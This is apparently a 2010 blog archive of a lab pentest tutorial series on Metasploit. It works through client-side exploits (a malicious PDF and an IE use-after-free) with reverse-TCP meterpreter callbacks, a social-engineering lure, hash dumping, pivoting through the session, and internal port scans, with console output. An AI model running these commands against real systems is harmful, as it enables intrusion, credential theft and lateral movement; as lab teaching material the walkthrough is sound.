Monthly Archives: September 2010

Metasploit on the edge Part 3 – Looking around

The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion

PreambleThis exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement

The following series of posts is going to change a little bit. We will still be walking through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server, but some of the detours I was planning on taking won’t happen. Vivek from securitytube.net has done an excellent series of video tutorials called the Metasploit Megaprimer and did a much better job of explaining the features of Meterpreter. Please goto securitytube.net and have a look

Background
When last we left, we had just launced a meterpreter session on our internal client.

Process
So now that we have a toe hold, let’s explore. First things first, I am going to grab the password hashes from the client machine. For a detailed explantion of Windows password hashing, see ironegeek.com’s password exploitation class. Depending on the exploit used and the account the exploit was run under you may have to do a
     meterpreter>use priv

     meterpreter>hashdump
The hashes will be displayed on the screen. For now, copy and paste them into a file for later use.
Let’s setup the client to allow us to use to scan other devices on the internal network.
First let’s see what the internal network is like
     meterpreter>route

Network routes
==============    Subnet           Netmask          Gateway
    ——           ——-          ——-
    0.0.0.0          0.0.0.0          10.13.37.1
    10.13.37.0       255.255.255.0    10.13.37.149
    10.13.37.149     255.255.255.255  127.0.0.1
    10.255.255.255   255.255.255.255  10.13.37.149
    127.0.0.0        255.0.0.0        127.0.0.1
Now to use it in Metasploit, press CTRL-Z and select Y to background the session

Next, we will setup Metasploit to use the client meterpreter session as a route
     meterpreter>route add 10.13.37.0 mask 255.255.255.0 4                                            ip subnet      network mask   meterpreter session

Now lets do a scan: (note: not all scans or exploits will work through this route.)
We will use the tcp portscan

     use auxillary/scanner/portscan/tcp

     msf auxiliary(tcp) > show options

Module options:
   Name         Current Setting                Required  Description
   —-         —————                ——–  ———–
   CONCURRENCY  10                             yes       The number of concurrent ports to check per host
   PORTS        21-25,80,137-139,443-445,3389  yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       10.13.37.1-254           yes       The target address range or CIDR identifier
   THREADS      1                              yes       The number of concurrent threads
   TIMEOUT      1000                           yes       The socket connect timeout in milliseconds
   VERBOSE      false                          no        Display verbose output
Note: When doing your initial scan, it is best to limit your ports. Once you have some responses, you can scan more ports on a particual client  if nescessary. 
     msf auxiliary(tcp) >exploit

[*] 10.13.37.1:21 – TCP OPEN
[*] 10.13.37.1:80 – TCP OPEN
[*] Scanned 026 of 254 hosts (010% complete)
[*] Scanned 051 of 254 hosts (020% complete)
[*] Scanned 077 of 254 hosts (030% complete)
[*] Scanned 102 of 254 hosts (040% complete)
[*] Scanned 127 of 254 hosts (050% complete)
[*] 10.13.37.130:80 – TCP OPEN
[*] 10.13.37.130:25 – TCP OPEN
[*] 10.13.37.130:139 – TCP OPEN
[*] 10.13.37.130:443 – TCP OPEN
[*] 10.13.37.130:445 – TCP OPEN
[*] 10.13.37.130:3389 – TCP OPEN[*] Scanned 153 of 254 hosts (060% complete)
[*] Scanned 178 of 254 hosts (070% complete)
[*] Scanned 204 of 254 hosts (080% complete)
[*] Scanned 229 of 254 hosts (090% complete)
[*] 10.13.37.242:22 – TCP OPEN
[*] 10.13.37.242:80 – TCP OPEN
[*] 10.13.37.242:139 – TCP OPEN
[*] 10.13.37.242:445 – TCP OPEN
[*] 10.13.37.244:135 – TCP OPEN
[*] 10.13.37.244:139 – TCP OPEN
[*] 10.13.37.244:445 – TCP OPEN
[*] 10.13.37.245:22 – TCP OPEN
[*] 10.13.37.245:23 – TCP OPEN
[*] 10.13.37.245:21 – TCP OPEN
[*] 10.13.37.245:25 – TCP OPEN
[*] 10.13.37.245:80 – TCP OPEN
[*] 10.13.37.245:139 – TCP OPEN
[*] 10.13.37.245:445 – TCP OPEN
[*] Scanned 254 of 254 hosts (100% complete)
[*] Auxiliary module execution completed

Next Steps
Selecting the next target, creating a “backdoor”…maybe I will also spend some time making these posts look better too…..

Metasploit on the edge Part 2 – a foothold

The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.

 

Preamble

 

This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.

 

The following series of posts will walk through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of remote desktop access to a Windows server. The purpose is not to go into great detail, but instead show the power of Meterpreter, its extensions and scripts.

 

Requirements

 

As mentioned previously, I will be using Backtrack 4 for the testing, and a few vulnerable machines. The first one up is an XP client with a vulnerable version of IE and Adobe Acrobat Reader.

 

I installed Adobe Reader 8, from oldapps.com for the prurpose of this exercise.

 

Background

 

Metasploit has several interfaces, but I like the console, so that is what will be used for this exercise. Throughout the exercise, we will get deeper and more familiar into Metasploit, but there are several excellent resources available for more information like the Metasploit.com site, the Metasploit mailing list, Offensive Security’s Metasploit Unleashed (offensive-security.com), some great videos and examples from Mubix (room362.com), IronGeek (irongeek.com) and the pauldotcom crew (pauldotcom.com) and a new course from SANS (sans.org) called Metasploit Kung Fu just to name a few.

 

We will be setting up two different client side exploits in this part of the exercise. Both will use the meterpreter payload, which will be explained in more detail in the next instalment.

 

Process

 

Adobe:

 

Launch msfconsole
  load sounds
  use exploit/windows/fileformat/adobe_geticon
  set FILENAME report.pdf
  set OUTPUTPATH /tmp
  set payload windows/meterpreter/reverse_tcp
  set LHOST 192.168.111.155
  set LPORT 443
  set InitialAutoRunScript migrate –f
  show options
   exploit

 

Explanation: In Backtrack, I type msfconsle at a terminal to launch.

 

The first command enables sounds. This isn’t necessary for anything other than my own enjoyment. May thanks to digininja for initially coming up with the idea for this functionality, and to HD for adding it to the base Metasploit framework

 

The rest of the commands are setting up the exploit. We are using the adobe geticon exploit to create a pdf called report.pdf which will be saved in the /tmp folder. When the pdf is opened with a vulnerable version of adobe, it will connect back to the backtrack machine on port 443 (remember, the firewall only allows web ports).

 

The AutoRunScript will, on a successful exploit, launch a hidden notepad.exe process on the client, and migrate the meterpreter payload to it. This will ensure that we don’t lose our meterpreter session as soon as the user closes Adobe (which they will, because to them, it would appear that adobe just froze). Look for more on this in a future post.

 

I try to always do a show options to verify I didn’t make any typos before I start the exploit.

 

Before we send the file to our client, we have to setup a listener on our machine to receive the reverse meterpreter.

 

Still in the msfconsole

   use exploit/multi/handler

   set payload windows/meterpreter/reverse_tcp

   set LHOST 192.168.111.155

   set LPORT 443

   exploit

 

Explanation: We are setting up a meterpreter listener for when the client opens our pdf. Metasploit will now dutifully wait until our client launches the pdf. When Metasploit “speaks” we know our target has launched the pdf.

 

 Internet Explorer

 

This time, we will use a vulnerability in Internet Explorer

  use exploit/windows/browser/ms10_018_ie_behaviors

 

instead of showing each command, I will just display the options. Each one is set with the command

 

set NAME #value#

 

msf exploit(ms10_018_ie_behaviors) > show options

 

Module options:

 Name Current Setting Required Description

 —- ————— ——– ———–

 SRVHOST 192.168.111.155 yes The local host to listen on.

 SRVPORT 80 yes The local port to listen on.

 SSL false no Negotiate SSL for incoming connections

 SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

 URIPATH reports no The URI to use for this exploit (default is random)

 Payload options (windows/meterpreter/reverse_tcp):

 Name Current Setting Required Description

 —- ————— ——– ———–

 EXITFUNC process yes Exit technique: seh, thread, process

 LHOST 192.168.111.155 yes The listen address

 LPORT 443 yes The listen port

 Exploit target:

 Id Name

 — —-

 0 (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista

 
Explanation:Notice that in this one, we didn’t set an initial script. This exploit has that setting already defined as the default, which you can varify by doing a show advanced.

All we have to do is type in exploit in our msfconsole, and convince our user to connect to http://192.168.111.155/reports.

 

 

 

msf exploit(ms10_018_ie_behaviors) > exploit

 

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.111.155:443

 [*] Using URL: http://192.168.111.155:80/reports

 [*] Server started.

 msf exploit(ms10_018_ie_behaviors) >

 [*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.111.156:64144 (target: IE 6 SP0-SP2 (onclick))…

 [*] Sending stage (748032 bytes) to 192.168.111.156

 [*] Meterpreter session 1 opened (192.168.111.155:443 -> 192.168.111.156:54337) at 2010-07-13 22:24:09 -0400

 [*] Session ID 1 (192.168.111.155:443 -> 192.168.111.156:54337) processing InitialAutoRunScript ‘migrate -f’

 [*] Current server process: iexplore.exe (352)

 [*] Spawning a notepad.exe host process…

 [*] Migrating into process ID 1416

 [*] New server process: notepad.exe (1416)

 

msf exploit(ms10_018_ie_behaviors) > sessions -i 1

[*] Starting interaction with 1…

meterpreter > ipconfig

AMD PCNET Family PCI Ethernet Adapter – Packet Scheduler Miniport

Hardware MAC: 00:0c:29:3e:23:8a

 IP Address : 10.13.37.149

 Netmask : 255.255.255.0
 
Explanation: After the meterpreter has connectect back to our listener, to interact with it you type sessions -i # where @ is the Metasploit session number of that particular session, in our case 1. Then I type ipconfig to show the ip of the clients machine.

 

Next Steps

 

Exploring the client’s network.

 

Metasploit on the edge



Metasploit on the edge originally aired on digitalcliff.spaces.live.com

 The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.
 Preamble
 This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.
 The following series of posts will walk through a fairly contrived example of how Metasploit can be used to exploit a client behind a firewall and from there be used to dig further into the network, with a final goal of  remote desktop access to a Windows server. The purpose is not to go into great detail, but instead show the power of Meterpreter, its extensions and scripts.
 Part 1 – The setup
Requirements
Before we can begin we need to setup our environment. I will be using VMware and sometimes VirtualBox, but any virtualization software or even a physical setup will work.
If you are looking for a real fun lab to test against, sign up for the Pentesting with Backtrack course from http://www.information-security-training.com. Not only do you get the excellent courseware, but the lab environment and the learning opportunities are amazing.
 Background
My attack machine will be a Backtrack 4 virtual machine, but any machine with Metasploit and some form of remote desktop client will work.
 Our victims will be various windows machines (make sure the are licensed, or use demo versions) behind a firewall that blocks internet traffic from entering, but allows client access to the internet. Our ultimate target is a Windows server that is located in the “secure” dmz.
Process
At a high level our plan of attack will be
            Exploit the client. 
            Scan the internal environment with Metasploit.
            Exploit our next victim.
            Use the second victim to explore and attack the final victim, the windows server.
            Complete the attack by accessing the remote desktop of the windows server.
Along the way, we will demo some client side exploits (a browser exploit and a pdf exploit), use the Meterpreter functions for pivoting (route and portfwd), some Meterpreter extensions (sniffer, incognito), creating a reverse Meterpreter executable and using some post exploitation scripts.
Next steps
Exploiting the client

Welcome to Blogger

I’ve been trying live spaces. It works OK, but thought I would give blogger a try.

The purpose of the blog (like just about every other blog) is to to help me keep track of things and if it helps someone else, great.

Most of the blogs will be focused on information security, but there might be the odd rant, review or random thought.